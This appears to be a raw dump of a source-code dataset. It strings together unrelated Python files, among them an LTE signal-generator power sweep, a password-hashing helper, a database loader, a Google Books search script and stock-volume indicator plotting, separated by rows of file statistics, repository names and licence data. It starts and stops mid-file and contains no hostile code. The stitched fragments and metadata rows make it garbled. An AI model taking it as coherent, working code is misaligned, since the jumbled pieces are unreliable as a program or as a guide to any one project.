print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_2_power(cell_2_flag)
cell_2_flag = float(cell_2_flag) + float(self.cell_2_step)
item += 1
time.sleep(float(self.cell_2_time))
# Only reachable for an inverted range (power_min > power_max): step downwards instead
while float(self.cell_2_power_min) >= cell_2_flag and float(self.cell_2_power_max) <= cell_2_flag:
print('--------------- Loop: ' + str(i + 1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_2_power(cell_2_flag)
cell_2_flag = float(cell_2_flag) - float(self.cell_2_step)
item += 1
time.sleep(float(self.cell_2_time))
cell_2_flag = float(self.cell_2_power_max)
while float(self.cell_2_power_min) <= cell_2_flag and float(self.cell_2_power_max) >= cell_2_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_2_power(cell_2_flag)
cell_2_flag = float(cell_2_flag) - float(self.cell_2_step)
item += 1
time.sleep(float(self.cell_2_time))
while float(self.cell_2_power_min) >= cell_2_flag and float(self.cell_2_power_max) <= cell_2_flag:
print('--------------- Loop: ' + str(i+1) + ' Step: ' + str(item) + ' ---------------')
self.manage_cell_2_power(cell_2_flag)
cell_2_flag = float(cell_2_flag) + float(self.cell_2_step)
item += 1
time.sleep(float(self.cell_2_time))
def manage_cell_1_power(self, cell_1_flag):
self.cmw_connection.timeout = 20000
self.cmw_connection.write("CONFigure:LTE:SIGN1:DL:PCC:RSEPre:LEVel " + str(cell_1_flag))
self.cmw_connection.write("CONFigure:LTE:SIGN1:DL:PCC:RSEPre:LEVel?")
print('Channel 1: ' + self.cmw_connection.read() + ' [dBm]')  # Send to the logging window
self.cmw_connection.clear()
def manage_cell_2_power(self, cell_2_flag):
self.cmw_connection.timeout = 20000
self.cmw_connection.write("CONFigure:LTE:SIGN2:DL:PCC:RSEPre:LEVel " + str(cell_2_flag))
self.cmw_connection.write("CONFigure:LTE:SIGN2:DL:PCC:RSEPre:LEVel?")
print('Channel 2: ' + self.cmw_connection.read() + ' [dBm]')  # Send to the logging window
self.cmw_connection.clear()
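For clarity, a minimal sketch of the ramp-up/ramp-down sweep the loops above implement, decoupled from the CMW500 session. sweep_power and the send() callback are hypothetical stand-ins for manage_cell_1_power(); the example levels at the bottom are assumptions, not values from the original script.

import time

def sweep_power(send, power_min, power_max, step, dwell_s):
    """Ramp from power_min up to power_max, then back down, one step at a time."""
    level = float(power_min)
    while float(power_min) <= level <= float(power_max):  # ramp up
        send(level)
        level += float(step)
        time.sleep(dwell_s)
    level = float(power_max)
    while float(power_min) <= level <= float(power_max):  # ramp back down
        send(level)
        level -= float(step)
        time.sleep(dwell_s)

# Example: print each level instead of writing SCPI to an instrument.
sweep_power(lambda dbm: print('RS EPRE level: %.1f dBm' % dbm), -100, -90, 2, 0.1)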
| 49.825472
| 116
| 0.513964
| 1,324
| 10,563
| 3.695619
| 0.066465
| 0.103209
| 0.159411
| 0.091559
| 0.807889
| 0.774167
| 0.733088
| 0.70325
| 0.70325
| 0.6589
| 0
| 0.040554
| 0.358042
| 10,563
| 211
| 117
| 50.061611
| 0.681021
| 0.025182
| 0
| 0.63125
| 0
| 0
| 0.077198
| 0.019647
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0375
| false
| 0
| 0.01875
| 0
| 0.0625
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1347bb51921a1449a797a7ccd365d2b4b2b2c105
| 30
|
py
|
Python
|
charles/__init__.py
|
LostRabbitLabs/DeathMetal
|
a5f06aae9028c09e55b193255d4f7a45aa471a46
|
[
"MIT"
] | 6
|
2019-11-13T23:59:40.000Z
|
2020-01-22T22:53:53.000Z
|
charles/__init__.py
|
LostRabbitLabs/DeathMetal
|
a5f06aae9028c09e55b193255d4f7a45aa471a46
|
[
"MIT"
] | null | null | null |
charles/__init__.py
|
LostRabbitLabs/DeathMetal
|
a5f06aae9028c09e55b193255d4f7a45aa471a46
|
[
"MIT"
] | null | null | null |
from charles.charles import *
| 15
| 29
| 0.8
| 4
| 30
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 30
| 1
| 30
| 30
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13686fde95aeb4a3a7d3cbd2d1c114790532b999
| 7
|
py
|
Python
|
test/assignment_samples/coma_instead_of_period_error.py
|
K44rel/error-explainer
|
786fa558efd0c26534e51a27924167000f1d1eef
|
[
"MIT"
] | 3
|
2022-01-05T19:07:06.000Z
|
2022-03-15T21:50:48.000Z
|
test/assignment_samples/coma_instead_of_period_error.py
|
kaareloide/error-explainer
|
786fa558efd0c26534e51a27924167000f1d1eef
|
[
"MIT"
] | 2
|
2021-04-13T07:20:15.000Z
|
2021-04-13T07:20:23.000Z
|
test/assignment_samples/coma_instead_of_period_error.py
|
kaareloide/error-explainer
|
786fa558efd0c26534e51a27924167000f1d1eef
|
[
"MIT"
] | null | null | null |
a = 3,4
| 7
| 7
| 0.428571
| 3
| 7
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 0.285714
| 7
| 1
| 7
| 7
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
138ef216098c37ceca23ef1e51ad66431774d690
| 186
|
py
|
Python
|
project_underhill/core/security.py
|
ErikSeguinte/project_underhill
|
38ed3b14e371a3bcdda13b512bcebfd7c892abd4
|
[
"MIT"
] | null | null | null |
project_underhill/core/security.py
|
ErikSeguinte/project_underhill
|
38ed3b14e371a3bcdda13b512bcebfd7c892abd4
|
[
"MIT"
] | null | null | null |
project_underhill/core/security.py
|
ErikSeguinte/project_underhill
|
38ed3b14e371a3bcdda13b512bcebfd7c892abd4
|
[
"MIT"
] | null | null | null |
from passlib.context import CryptContext
import secrets
pwd_context = CryptContext(schemes=["argon2"], deprecated="auto")
def get_random_string():
return secrets.token_urlsafe(5)
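A short usage sketch for the helpers above (requires passlib's argon2 backend, i.e. the argon2-cffi package; the password strings are made-up examples):

hashed = pwd_context.hash("s3cret-password")   # salted: differs on every call
assert pwd_context.verify("s3cret-password", hashed)
assert not pwd_context.verify("wrong-password", hashed)
print(get_random_string())  # short URL-safe token, e.g. 'q8PL3vA'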
| 20.666667
| 65
| 0.784946
| 23
| 186
| 6.173913
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012121
| 0.112903
| 186
| 8
| 66
| 23.25
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0.053763
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0.2
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
|
0
| 6
|
13b2200fff7ba525fde3a3e0a0da1949a62f4a35
| 136
|
py
|
Python
|
etl/loader/db/__init__.py
|
damklis/etljob
|
c72d53c9b38e1cf38307309a55f55513ced3c8a3
|
[
"BSD-2-Clause"
] | 8
|
2021-02-11T21:18:24.000Z
|
2022-02-14T15:35:36.000Z
|
etl/loader/db/__init__.py
|
damklis/etljob
|
c72d53c9b38e1cf38307309a55f55513ced3c8a3
|
[
"BSD-2-Clause"
] | 1
|
2021-06-13T10:48:07.000Z
|
2021-06-13T10:48:07.000Z
|
etl/loader/db/__init__.py
|
damklis/etljob
|
c72d53c9b38e1cf38307309a55f55513ced3c8a3
|
[
"BSD-2-Clause"
] | 2
|
2021-12-28T18:38:38.000Z
|
2022-03-01T03:25:29.000Z
|
from etl.loader.db.flight import Flight
from etl.loader.db.base import (
engine, Session, Base
)
Base.metadata.create_all(engine)
| 17
| 39
| 0.757353
| 21
| 136
| 4.857143
| 0.571429
| 0.137255
| 0.254902
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139706
| 136
| 7
| 40
| 19.428571
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
13bf949c26c8d3e52fbd9d1d7497b3d9837ae8b9
| 18
|
py
|
Python
|
src/__init__.py
|
tborzyszkowski/TestAutomationInPython
|
843c71df796588e181466d9b9b549f03dd907a6e
|
[
"MIT"
] | 2
|
2020-10-08T09:44:12.000Z
|
2021-10-08T08:32:19.000Z
|
src/__init__.py
|
tborzyszkowski/TestAutomationInPython
|
843c71df796588e181466d9b9b549f03dd907a6e
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
tborzyszkowski/TestAutomationInPython
|
843c71df796588e181466d9b9b549f03dd907a6e
|
[
"MIT"
] | 1
|
2020-10-19T14:08:00.000Z
|
2020-10-19T14:08:00.000Z
|
from .oop import *
| 18
| 18
| 0.722222
| 3
| 18
| 4.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 18
| 1
| 18
| 18
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13c9802112e1dbe22e44e6663a959baa63a5e4b6
| 20
|
py
|
Python
|
acq4/devices/PVCam/__init__.py
|
ablot/acq4
|
ba7cd340d9d0282640adb501d3788f8c0837e4c4
|
[
"MIT"
] | null | null | null |
acq4/devices/PVCam/__init__.py
|
ablot/acq4
|
ba7cd340d9d0282640adb501d3788f8c0837e4c4
|
[
"MIT"
] | null | null | null |
acq4/devices/PVCam/__init__.py
|
ablot/acq4
|
ba7cd340d9d0282640adb501d3788f8c0837e4c4
|
[
"MIT"
] | null | null | null |
from PVCam import *
| 10
| 19
| 0.75
| 3
| 20
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 20
| 1
| 20
| 20
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13eb775a8053d935399747d2bedaf755a615d554
| 48
|
py
|
Python
|
ai/algorithms/reinforcement_learning/__init__.py
|
rbak/ai-implementations
|
5b773c23a5582b05b8aef55ea70e800cf4ffa376
|
[
"MIT"
] | null | null | null |
ai/algorithms/reinforcement_learning/__init__.py
|
rbak/ai-implementations
|
5b773c23a5582b05b8aef55ea70e800cf4ffa376
|
[
"MIT"
] | null | null | null |
ai/algorithms/reinforcement_learning/__init__.py
|
rbak/ai-implementations
|
5b773c23a5582b05b8aef55ea70e800cf4ffa376
|
[
"MIT"
] | null | null | null |
from .monte_carlo import *
from .sarsa import *
| 16
| 26
| 0.75
| 7
| 48
| 5
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 48
| 2
| 27
| 24
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b91228598ec4e4601729a55d590f9b206cc33281
| 105
|
py
|
Python
|
cassiopeia/__main__.py
|
Lioscro/Cassiopeia
|
fa630e167b3d8e6fb1c88740dff71130224ca54c
|
[
"MIT"
] | null | null | null |
cassiopeia/__main__.py
|
Lioscro/Cassiopeia
|
fa630e167b3d8e6fb1c88740dff71130224ca54c
|
[
"MIT"
] | null | null | null |
cassiopeia/__main__.py
|
Lioscro/Cassiopeia
|
fa630e167b3d8e6fb1c88740dff71130224ca54c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import Cassiopeia
def main():
print("Congrats, you've entered the program!")
| 15
| 50
| 0.695238
| 15
| 105
| 4.866667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161905
| 105
| 6
| 51
| 17.5
| 0.829545
| 0.190476
| 0
| 0
| 0
| 0
| 0.440476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b9152d833ceca1361f3f634943aea24e51af6ece
| 888
|
py
|
Python
|
app/entity/user_entity.py
|
JunFuruya/Ratsnake
|
ff7fe7f6b56663978d2ee2d94df5d88786a0eaa7
|
[
"MIT"
] | null | null | null |
app/entity/user_entity.py
|
JunFuruya/Ratsnake
|
ff7fe7f6b56663978d2ee2d94df5d88786a0eaa7
|
[
"MIT"
] | 5
|
2018-05-17T04:03:39.000Z
|
2021-09-08T01:03:17.000Z
|
app/entity/user_entity.py
|
JunFuruya/Hideout
|
ff7fe7f6b56663978d2ee2d94df5d88786a0eaa7
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
from app.entity.base_web_entity import BaseWebEntity
from app.helper.hash_helper import HashHelper
class UserEntity(BaseWebEntity):
__user_id = None
__user_username = ''
__user_hashed_password = ''
def set_user_id(self, user_id):
self.__user_id = user_id
return self
def get_user_id(self):
return self.__user_id
def set_user_username(self, user_username):
self.__user_username = user_username
return self
def get_user_username(self):
return self.__user_username
def set_user_hashed_password(self, user_hashed_password):
self.__user_hashed_password = user_hashed_password
return self
def get_user_hashed_password(self):
return self.__user_hashed_password
#def to_array(self):
# TODO: implement
#pass
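Because every setter returns self, calls chain fluently. A hypothetical usage sketch (assumes the app package is importable and BaseWebEntity needs no constructor arguments; the values are made up):

user = (UserEntity()
        .set_user_id(42)
        .set_user_username('alice')
        .set_user_hashed_password('<precomputed-hash>'))
print(user.get_user_username())  # -> 'alice'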
| 25.371429
| 61
| 0.672297
| 111
| 888
| 4.873874
| 0.279279
| 0.133087
| 0.232902
| 0.088725
| 0.354898
| 0.114603
| 0.114603
| 0
| 0
| 0
| 0
| 0.001522
| 0.260135
| 888
| 35
| 62
| 25.371429
| 0.821918
| 0.067568
| 0
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0
| 1
| 0.285714
| false
| 0.238095
| 0.095238
| 0.142857
| 0.857143
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
b944f18eebc013d50a2ec5280216bc05b7e81397
| 9,165
|
py
|
Python
|
performbooksearch.py
|
klever12/Search-Books
|
eb5fb1f03dbdcef8c9735783a1db233fccd8ead5
|
[
"MIT"
] | null | null | null |
performbooksearch.py
|
klever12/Search-Books
|
eb5fb1f03dbdcef8c9735783a1db233fccd8ead5
|
[
"MIT"
] | null | null | null |
performbooksearch.py
|
klever12/Search-Books
|
eb5fb1f03dbdcef8c9735783a1db233fccd8ead5
|
[
"MIT"
] | null | null | null |
from termcolor import colored
import json
from urllib.request import urlopen
from urllib.error import URLError
from printlists import print_searched_books
def search_books():
"""This function searches for books using the Google Books API"""
searching_books = True
api = "https://www.googleapis.com/books/v1/volumes?q="
max_results = "&maxResults=5"
print("\n")
# start performing book search
while searching_books:
user_choice = input(
colored("Would you like to search by title(t), "
"author(a), or publishing company(p)? Or "
"would you like to cancel search(c)?\n", 'red')) \
.strip()
# search by title
if user_choice == "T" or user_choice == "t":
search_term = "intitle:"
book_to_search = input(colored("Enter title to search for: ",
'red')).strip()
book_to_search = ' '.join(book_to_search.split())
book_to_search = book_to_search.replace(" ", "+")
try:
resp = urlopen(api + search_term + book_to_search +
max_results)
except URLError:
print(colored("Sorry. No internet connection detected. "
"Please check network connection and try "
"again.\n", 'red'))
return {}
book_data = json.load(resp)
if book_data['totalItems'] == 0:
print(
colored("Sorry. No books were found with that title. ",
'red'))
return {}
else:
if book_data['totalItems'] < 5:
number_books_found = book_data['totalItems']
searched_books = {}
else:
number_books_found = 5
searched_books = {}
for x in range(number_books_found):
book_title = book_data["items"][x]["volumeInfo"] \
.get('title')
book_author = book_data["items"][x]["volumeInfo"] \
.get('authors')
book_publisher = book_data["items"][x]["volumeInfo"] \
.get('publisher')
if book_title is None:
book_title = "-No Title-"
else:
book_title = book_data["items"][x]["volumeInfo"][
"title"]
if book_author is None:
book_author = ["-No author-"]
else:
book_author = book_data["items"][x]["volumeInfo"][
"authors"]
if book_publisher is None:
book_publisher = "-No Publisher-"
else:
book_publisher = \
book_data["items"][x]["volumeInfo"][
'publisher']
book_information = [book_title, book_author,
book_publisher]
searched_books[x + 1] = book_information
print_searched_books(searched_books)
return searched_books
# search by author
elif user_choice == "A" or user_choice == "a":
search_term = "inauthor:"
author_to_search = input(colored("Enter author to search for: "
, 'red')) \
.strip()
author_to_search = ' '.join(author_to_search.split())
author_to_search = author_to_search.replace(" ", "+")
try:
resp = urlopen(api + search_term + author_to_search +
max_results)
except URLError:
print(colored("Sorry. No internet connection detected. "
"Please check network connection and try "
"again.\n", 'red'))
return {}
book_data = json.load(resp)
if book_data['totalItems'] == 0:
print(
colored("Sorry. No books were found with that title. ",
'red'))
return {}
else:
if book_data['totalItems'] < 5:
number_books_found = book_data['totalItems']
searched_books = {}
else:
number_books_found = 5
searched_books = {}
for x in range(number_books_found):
book_title = book_data["items"][x]["volumeInfo"] \
.get('title')
book_author = book_data["items"][x]["volumeInfo"] \
.get('authors')
book_publisher = book_data["items"][x]["volumeInfo"] \
.get('publisher')
if book_title is None:
book_title = "-No Title-"
else:
book_title = book_data["items"][x]["volumeInfo"][
"title"]
if book_author is None:
book_author = ["-No author-"]
else:
book_author = book_data["items"][x]["volumeInfo"][
"authors"]
if book_publisher is None:
book_publisher = "-No Publisher-"
else:
book_publisher = \
book_data["items"][x]["volumeInfo"][
'publisher']
book_information = [book_title, book_author,
book_publisher]
searched_books[x + 1] = book_information
print_searched_books(searched_books)
return searched_books
# search by publisher
elif user_choice == "P" or user_choice == "p":
search_term = "inpublisher:"
publisher_to_search = input(
colored("Enter publisher to search for: ", 'red')) \
.strip()
publisher_to_search = ' '.join(publisher_to_search.split())
publisher_to_search = publisher_to_search.replace(" ", "+")
try:
resp = urlopen(api + search_term + publisher_to_search +
max_results)
except URLError:
print(colored("Sorry. No internet connection detected. "
"Please check network connection and try "
"again.\n", 'red'))
return {}
book_data = json.load(resp)
if book_data['totalItems'] == 0:
print(
colored("Sorry. No books were found with that title. ",
'red'))
return {}
else:
if book_data['totalItems'] < 5:
number_books_found = book_data['totalItems']
searched_books = {}
else:
number_books_found = 5
searched_books = {}
for x in range(number_books_found):
book_title = book_data["items"][x]["volumeInfo"] \
.get('title')
book_author = book_data["items"][x]["volumeInfo"] \
.get('authors')
book_publisher = book_data["items"][x]["volumeInfo"] \
.get('publisher')
if book_title is None:
book_title = "-No Title-"
else:
book_title = book_data["items"][x]["volumeInfo"][
"title"]
if book_author is None:
book_author = ["-No author-"]
else:
book_author = book_data["items"][x]["volumeInfo"][
"authors"]
if book_publisher is None:
book_publisher = "-No Publisher-"
else:
book_publisher = \
book_data["items"][x]["volumeInfo"][
'publisher']
book_information = [book_title, book_author,
book_publisher]
searched_books[x + 1] = book_information
print_searched_books(searched_books)
return searched_books
# cancel book search
elif user_choice == "C" or user_choice == "c":
print(colored("Book search canceled.\n", 'red'))
return {}
# user input was invalid
else:
print(colored("Sorry. That was an invalid option.\n", 'red'))
| 38.34728
| 75
| 0.441244
| 795
| 9,165
| 4.860377
| 0.142138
| 0.062112
| 0.060559
| 0.065217
| 0.744048
| 0.709886
| 0.709886
| 0.709886
| 0.709886
| 0.677277
| 0
| 0.002853
| 0.464594
| 9,165
| 238
| 76
| 38.508403
| 0.784593
| 0.020076
| 0
| 0.792553
| 0
| 0
| 0.154961
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005319
| false
| 0
| 0.026596
| 0
| 0.085106
| 0.069149
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b967e5257f48f996a8a9f4440fee5546624a41d2
| 8,977
|
py
|
Python
|
technical_analysis/volume.py
|
benkulbertis/GamestonkTerminal
|
f1ebf7c3082b7d985e038fdb4021be317be001d2
|
[
"MIT"
] | null | null | null |
technical_analysis/volume.py
|
benkulbertis/GamestonkTerminal
|
f1ebf7c3082b7d985e038fdb4021be317be001d2
|
[
"MIT"
] | null | null | null |
technical_analysis/volume.py
|
benkulbertis/GamestonkTerminal
|
f1ebf7c3082b7d985e038fdb4021be317be001d2
|
[
"MIT"
] | null | null | null |
import argparse
import pandas_ta as ta
import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters
from helper_funcs import check_positive
register_matplotlib_converters()
# ------------------------------------------------------- AD -------------------------------------------------------
def ad(l_args, s_ticker, s_interval, df_stock):
parser = argparse.ArgumentParser(prog='ad',
description=""" The Accumulation/Distribution Line is similar to the On Balance
Volume (OBV), which sums the volume times +1/-1 based on whether the close is
higher than the previous close. The Accumulation/Distribution indicator, however
multiplies the volume by the close location value (CLV). The CLV is based on the
movement of the issue within a single bar and can be +1, -1 or zero. \n \n
The Accumulation/Distribution Line is interpreted by looking for a divergence in
the direction of the indicator relative to price. If the Accumulation/Distribution
Line is trending upward it indicates that the price may follow. Also, if the
Accumulation/Distribution Line becomes flat while the price is still rising (or falling)
then it signals an impending flattening of the price.""")
parser.add_argument('-o', "--offset", action="store", dest="n_offset", type=check_positive, default=0, help='offset')
parser.add_argument('--open', action="store_true", default=False, dest="b_use_open", help='uses open value of stock')
(ns_parser, l_unknown_args) = parser.parse_known_args(l_args)
if l_unknown_args:
print(f"The following args couldn't be interpreted: {l_unknown_args}\n")
return
# Daily
if s_interval == "1440min":
# Use open stock values
if ns_parser.b_use_open:
df_ta = ta.ad(high=df_stock['2. high'], low=df_stock['3. low'], close=df_stock['5. adjusted close'],
volume=df_stock['6. volume'], offset=ns_parser.n_offset, open_=df_stock['1. open']).dropna()
# Do not use open stock values
else:
df_ta = ta.ad(high=df_stock['2. high'], low=df_stock['3. low'], close=df_stock['5. adjusted close'],
volume=df_stock['6. volume'], offset=ns_parser.n_offset).dropna()
axPrice = plt.subplot(211)
plt.plot(df_stock.index, df_stock['5. adjusted close'].values, 'k', lw=2)
plt.title(f"Accumulation/Distribution Line (AD) on {s_ticker}")
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.ylabel(f'Share Price ($)')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
axVolume = axPrice.twinx()
plt.bar(df_stock.index, df_stock['6. volume'].values, color='k', alpha=0.8, width=.3)
plt.subplot(212)
plt.plot(df_ta.index, df_ta.values, 'b', lw=1)
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.axhline(0, linewidth=2, color='k', ls='--')
plt.legend([f'Chaikin Oscillator'])
plt.xlabel('Time')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
plt.show()
# Intraday
else:
# Use open stock values
if ns_parser.b_use_open:
df_ta = ta.ad(high=df_stock['2. high'], low=df_stock['3. low'], close=df_stock['4. close'],
volume=df_stock['5. volume'], offset=ns_parser.n_offset, open_=df_stock['1. open']).dropna()
# Do not use open stock values
else:
df_ta = ta.ad(high=df_stock['2. high'], low=df_stock['3. low'], close=df_stock['4. close'],
volume=df_stock['5. volume'], offset=ns_parser.n_offset).dropna()
axPrice = plt.subplot(211)
plt.plot(df_stock.index, df_stock['4. close'].values, 'k', lw=2)
plt.title(f"Accumulation/Distribution Line (AD) on {s_ticker}")
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.ylabel(f'Share Price ($)')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
axVolume = axPrice.twinx()
plt.bar(df_stock.index, df_stock['5. volume'].values, color='k', alpha=0.8, width=.3)
plt.subplot(212)
plt.plot(df_ta.index, df_ta.values, 'b', lw=1)
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.axhline(0, linewidth=2, color='k', ls='--')
plt.legend([f'Chaikin Oscillator'])
plt.xlabel('Time')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
plt.show()
print("")
# ------------------------------------------------------- OBV -------------------------------------------------------
def obv(l_args, s_ticker, s_interval, df_stock):
parser = argparse.ArgumentParser(prog='obv',
description=""" The On Balance Volume (OBV) is a cumulative total of the up and
down volume. When the close is higher than the previous close, the volume is added
to the running total, and when the close is lower than the previous close, the volume
is subtracted from the running total. \n \n To interpret the OBV, look for the OBV
to move with the price or precede price moves. If the price moves before the OBV,
then it is a non-confirmed move. A series of rising peaks, or falling troughs, in the
OBV indicates a strong trend. If the OBV is flat, then the market is not trending. """)
parser.add_argument('-o', "--offset", action="store", dest="n_offset", type=check_positive, default=0, help='offset')
(ns_parser, l_unknown_args) = parser.parse_known_args(l_args)
if l_unknown_args:
print(f"The following args couldn't be interpreted: {l_unknown_args}\n")
return
# Daily
if s_interval == "1440min":
df_ta = ta.obv(close=df_stock['5. adjusted close'], volume=df_stock['6. volume'], offset=ns_parser.n_offset).dropna()
axPrice = plt.subplot(211)
plt.plot(df_stock.index, df_stock['5. adjusted close'].values, 'k', lw=2)
plt.title(f"On-Balance Volume (OBV) on {s_ticker}")
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.ylabel(f'Share Price ($)')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
axVolume = axPrice.twinx()
plt.bar(df_stock.index, df_stock['6. volume'].values, color='k', alpha=0.8, width=.3)
plt.subplot(212)
plt.plot(df_ta.index, df_ta.values, 'b', lw=1)
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.legend([f'OBV'])
plt.xlabel('Time')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
plt.show()
# Intraday
else:
df_ta = ta.obv(close=df_stock['4. close'], volume=df_stock['5. volume'], offset=ns_parser.n_offset).dropna()
axPrice = plt.subplot(211)
